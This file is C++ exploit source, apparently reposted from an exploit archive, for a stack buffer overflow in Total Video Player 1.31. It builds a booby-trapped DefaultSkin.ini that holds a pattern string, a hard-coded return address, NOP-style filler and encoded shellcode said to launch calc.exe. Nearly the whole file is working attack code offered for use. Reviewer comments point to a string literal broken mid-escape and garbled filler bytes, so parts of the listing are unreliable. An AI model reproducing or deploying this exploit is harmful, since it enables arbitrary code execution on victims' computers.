/*##############################################################################################
title : Total Video Player V1.31 stack overflow
author : Ayrbyte
link : http://www.softpedia.com/get/Multimedia/Video/Video-Players/Total-Video-Player.shtml
tested on : Windows XP sp 2
fb : fb.me/Ayrbyte
greetz to : thanks to Zax Oktav, Andy Oioi, Rizaldy Ahmad, Rezza Aulia Pratama, Cloud Sky,
Zet Dot Exe and all b-compi family ^_^
We are B-Compi... We are Hacker... We Are Proud...!
################################################################################################
>>compile this exploit to generate the file DefaultSkin.ini
>>put the file DefaultSkin.ini at [TVP installation folder]\Skins\DefaultSkin\DefaultSkin.ini
>>run TVP and calc.exe will be launched
##############################################################################################*/
#include <cstdio>
#include <cstring>
#include <iostream>
using namespace std;
// Buffers written to DefaultSkin.ini by main(), in the order listed here.
//
// _isi1: opening part of the INI file as hex-encoded ASCII ([General],
// [Windows], [HookFilter], ... sections), ending with the "ColumnHeaderStart="
// key whose value is built from the buffers that follow.
// NOTE(review): in this listing the literal is split across two lines in the
// middle of an escape sequence ("\x0" / "A"); as printed that is not a valid
// string literal, presumably a line-wrapping artifact of a "\x0D\x0A" pair.
char _isi1[] =
"\x5B\x47\x65\x6E\x65\x72\x61\x6C\x5D\x20\x0D\x0A\x41\x75\x74\x68\x6F\x72\x3A\x20\x41\x79\x72\x62\x79\x74\x65\x0D\x0A\x43\x6F\x6E\x74\x61\x63\x74\x3A\x20\x62\x2D\x63\x6F\x6D\x70\x69\x2E\x6E\x65\x74\x0D\x0A\x0D\x0A\x5B\x57\x69\x6E\x64\x6F\x77\x73\x5D\x0D\x0A\x4D\x61\x69\x6E\x57\x69\x6E\x64\x6F\x77\x20\x3D\x20\x74\x76\x70\x2E\x65\x78\x65\x2C\x49\x44\x0D\x0A\x50\x6C\x69\x73\x74\x57\x69\x6E\x64\x6F\x77\x20\x3D\x20\x70\x6C\x73\x2E\x64\x6C\x6C\x2C\x49\x44\x0D\x0A\x41\x62\x6F\x75\x74\x57\x69\x6E\x64\x6F\x77\x20\x3D\x20\x74\x76\x70\x2E\x65\x78\x65\x2C\x49\x44\x0D\x0A\x56\x43\x74\x72\x6C\x57\x69\x6E\x64\x6F\x77\x20\x3D\x20\x74\x76\x70\x2E\x65\x78\x65\x2C\x49\x44\x0D\x0A\x0D\x0A\x5B\x48\x6F\x6F\x6B\x46\x69\x6C\x74\x65\x72\x5D\x0D\x0A\x4E\x6F\x74\x48\x6F\x6F\x6B\x20\x3D\x20\x4D\x61\x69\x6E\x57\x69\x6E\x64\x6F\x77\x2C\x50\x6C\x69\x73\x74\x57\x69\x6E\x64\x6F\x77\x0D\x0A\x0D\x0A\x5B\x48\x6F\x6F\x6B\x53\x70\x65\x63\x69\x61\x6C\x5D\x0D\x0A\x53\x70\x65\x63\x69\x61\x6C\x20\x3D\x20\x41\x62\x6F\x75\x74\x57\x69\x6E\x64\x6F\x77\x0D\x0A\x0D\x0A\x5B\x4D\x61\x69\x6E\x57\x69\x6E\x64\x6F\x77\x53\x43\x52\x45\x45\x4E\x5D\x0D\x0A\x4D\x61\x73\x6B\x3D\x4D\x61\x73\x6B\x2E\x62\x6D\x70\x0D\x0A\x4D\x61\x69\x6E\x3D\x4E\x6F\x72\x6D\x61\x6C\x2E\x62\x6D\x70\x0D\x0A\x44\x6F\x77\x6E\x3D\x64\x6F\x77\x6E\x2E\x62\x6D\x70\x0D\x0A\x4F\x76\x65\x72\x3D\x6F\x76\x65\x72\x2E\x62\x6D\x70\x0D\x0A\x44\x69\x73\x61\x62\x6C\x65\x64\x3D\x64\x69\x73\x61\x62\x6C\x65\x2E\x62\x6D\x70\x0D\x0A\x52\x65\x53\x69\x7A\x65\x3D\x46\x41\x4C\x53\x45\x0D\x0A\x0D\x0A\x5B\x50\x6C\x69\x73\x74\x57\x69\x6E\x64\x6F\x77\x53\x43\x52\x45\x45\x4E\x5D\x0D\x0A\x4D\x61\x69\x6E\x3D\x50\x4C\x42\x75\x74\x74\x6F\x6E\x4E\x6F\x72\x6D\x61\x6C\x2E\x62\x6D\x70\x0D\x0A\x44\x6F\x77\x6E\x3D\x50\x4C\x42\x75\x74\x74\x6F\x6E\x44\x6F\x77\x6E\x2E\x62\x6D\x70\x0D\x0A\x4F\x76\x65\x72\x3D\x50\x4C\x42\x75\x74\x74\x6F\x6E\x4F\x76\x65\x72\x2E\x62\x6D\x70\x0D\x0A\x44\x69\x73\x61\x62\x6C\x65\x64\x3D\x50\x4C\x42\x75\x74\x74\x6F\x6E\x4E\x6F\x72\x6D\x61\x6C\x2E\x62\x6D\x70\x0D\x0
A\x52\x65\x53\x69\x7A\x65\x3D\x54\x52\x55\x45\x0D\x0A\x0D\x0A\x5B\x50\x6C\x69\x73\x74\x57\x69\x6E\x64\x6F\x77\x4D\x45\x4E\x55\x5D\x0D\x0A\x42\x6B\x50\x69\x63\x4E\x61\x6D\x65\x3D\x4D\x65\x6E\x75\x2E\x62\x6D\x70\x0D\x0A\x46\x6F\x6E\x74\x4E\x61\x6D\x65\x3D\x4D\x53\x20\x53\x61\x6E\x73\x20\x53\x65\x72\x69\x66\x0D\x0A\x0D\x0A\x5B\x50\x6C\x69\x73\x74\x57\x69\x6E\x64\x6F\x77\x4C\x49\x53\x54\x43\x54\x52\x4C\x53\x54\x59\x4C\x45\x5D\x0D\x0A\x43\x6F\x6C\x75\x6D\x6E\x48\x65\x61\x64\x65\x72\x53\x70\x61\x6E\x3D\x43\x6F\x6C\x75\x6D\x6E\x48\x65\x61\x64\x65\x72\x53\x70\x61\x6E\x2E\x62\x6D\x70\x0D\x0A\x43\x6F\x6C\x75\x6D\x6E\x48\x65\x61\x64\x65\x72\x45\x6E\x64\x3D\x43\x6F\x6C\x75\x6D\x6E\x48\x65\x61\x64\x65\x72\x45\x6E\x64\x2E\x62\x6D\x70\x0D\x0A\x43\x6F\x6C\x75\x6D\x6E\x48\x65\x61\x64\x65\x72\x53\x74\x61\x72\x74\x3D";
// _A: pattern text placed before the return-address position.
char _A[] =
"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6";
// _EIP: the 4 bytes written at the return-address position; little-endian
// 0x7C941EED, which main()'s comment attributes to ntdll.dll.
char _EIP[] = "\xED\x1E\x94\x7c";
// _B: filler written between _EIP and the payload.
// NOTE(review): the non-ASCII characters shown here look like an encoding
// artifact of the listing; the original byte values cannot be confirmed from
// this page.
char _B[]=
"BBBBBBBBBBBBђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђђ";
// _playload: the payload bytes; main()'s comment says it launches calc.exe.
// fputs() in main() writes it up to the first NUL byte only.
char _playload[] =
"\xdb\xd7\xd9\x74\x24\xf4\xb8\x79\xc4\x64\xb7\x33\xc9\xb1\x38"
"\x5d\x83\xc5\x04\x31\x45\x13\x03\x3c\xd7\x86\x42\x42\x3f\xcf"
"\xad\xba\xc0\xb0\x24\x5f\xf1\xe2\x53\x14\xa0\x32\x17\x78\x49"
"\xb8\x75\x68\xda\xcc\x51\x9f\x6b\x7a\x84\xae\x6c\x4a\x08\x7c"
"\xae\xcc\xf4\x7e\xe3\x2e\xc4\xb1\xf6\x2f\x01\xaf\xf9\x62\xda"
"\xa4\xa8\x92\x6f\xf8\x70\x92\xbf\x77\xc8\xec\xba\x47\xbd\x46"
"\xc4\x97\x6e\xdc\x8e\x0f\x04\xba\x2e\x2e\xc9\xd8\x13\x79\x66"
"\x2a\xe7\x78\xae\x62\x08\x4b\x8e\x29\x37\x64\x03\x33\x7f\x42"
"\xfc\x46\x8b\xb1\x81\x50\x48\xc8\x5d\xd4\x4d\x6a\x15\x4e\xb6"
"\x8b\xfa\x09\x3d\x87\xb7\x5e\x19\x8b\x46\xb2\x11\xb7\xc3\x35"
"\xf6\x3e\x97\x11\xd2\x1b\x43\x3b\x43\xc1\x22\x44\x93\xad\x9b"
"\xe0\xdf\x5f\xcf\x93\xbd\x35\x0e\x11\xb8\x70\x10\x29\xc3\xd2"
"\x79\x18\x48\xbd\xfe\xa5\x9b\xfa\xf1\xef\x86\xaa\x99\xa9\x52"
"\xef\xc7\x49\x89\x33\xfe\xc9\x38\xcb\x05\xd1\x48\xce\x42\x55"
"\xa0\xa2\xdb\x30\xc6\x11\xdb\x10\xa5\xaf\x7f\xcc\x43\xa1\x1b"
"\x9d\xe4\x4e\xb8\x32\x72\xc3\x34\xd0\xe9\x10\x87\x46\x91\x37"
"\x8b\x15\x7b\xd2\x2b\xbf\x83";
char _akhir[] = "B"; // junk value used to pad the input so its length stays at 1000
char _isi2[] = // closing contents: hex-encoded "ColumnHeaderSpan.bmp"
"\x43\x6F\x6C\x75\x6D\x6E\x48\x65\x61\x64\x65\x72\x53\x70\x61\x6E\x2E\x62\x6D\x70";
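// Writes DefaultSkin.ini from the global buffers: the INI prefix, the
// fixed-length record (pattern, return address, filler, payload, "B" padding
// up to 1000 bytes) and the INI suffix.
// Returns 0 on success, 1 when the output file cannot be created.
int main(){
    // Name of the file TVP reads from its Skins\DefaultSkin folder.
    const char* const name_file = "DefaultSkin.ini";
    FILE* file = fopen(name_file, "w");
    if (!file) {
        // The original code passed a null FILE* straight to fputs().
        perror(name_file);
        return 1;
    }
    fputs(_isi1, file);     // opening contents
    fputs(_A, file);        // input before EIP
    fputs(_EIP, file);      // EIP = 7C941EED, JMP ESP from ntdll.dll
    fputs(_B, file);        // filler ("nop") bytes before the payload
    fputs(_playload, file); // payload that launches calc.exe
    // The value landing in EIP depends on the total input length, so the
    // record is padded with junk "B" bytes up to 1000 so that EIP stays fixed.
    // strlen() stops at the first NUL, exactly where fputs() stops writing.
    const size_t used = strlen(_A) + strlen(_EIP) + strlen(_B) + strlen(_playload);
    // The original loop bound "1000 - used" was unsigned; if 'used' ever
    // exceeded 1000 it would wrap to a huge count. Write no padding instead.
    const size_t padding = used < 1000 ? 1000 - used : 0;
    for (size_t i = 0; i < padding; ++i) {
        fputs(_akhir, file);
    }
    fputs(_isi2, file); // closing contents
    fclose(file);
    return 0;
}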
# 0day.today [2018-04-05] #